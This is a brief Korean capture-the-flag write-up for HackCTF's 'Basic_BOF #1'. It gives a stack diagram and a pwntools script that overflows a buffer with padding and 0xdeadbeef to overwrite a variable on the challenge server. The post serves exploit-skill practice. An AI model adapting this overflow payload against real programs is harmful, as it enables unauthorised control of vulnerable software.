Pwnable/HackCTF
Basic_BOF #1
Lucvs
2020. 8. 28. 17:41
gdb와 ida로 바이너리파일을 분석한 결과 메모리 구조는 다음과 같다.
—————————— High Address
| ret(4) |
——————————
| sfp(4) |
—————————— ← ebp
| dummy |
——————————
| v5 |
—————————— ← ebp - 0xc
| dummy |
——————————
| s |
—————————— Low Address ← ebp -0x34
payload 입력하여 다음과 같이 flag를 얻었다.
from pwn import *
r = remote("ctf.j0n9hyun.xyz", 3000)
payload = "\x90"*40 + "\xef\xbe\xad\xde"
r.sendline(payload)
r.interactive()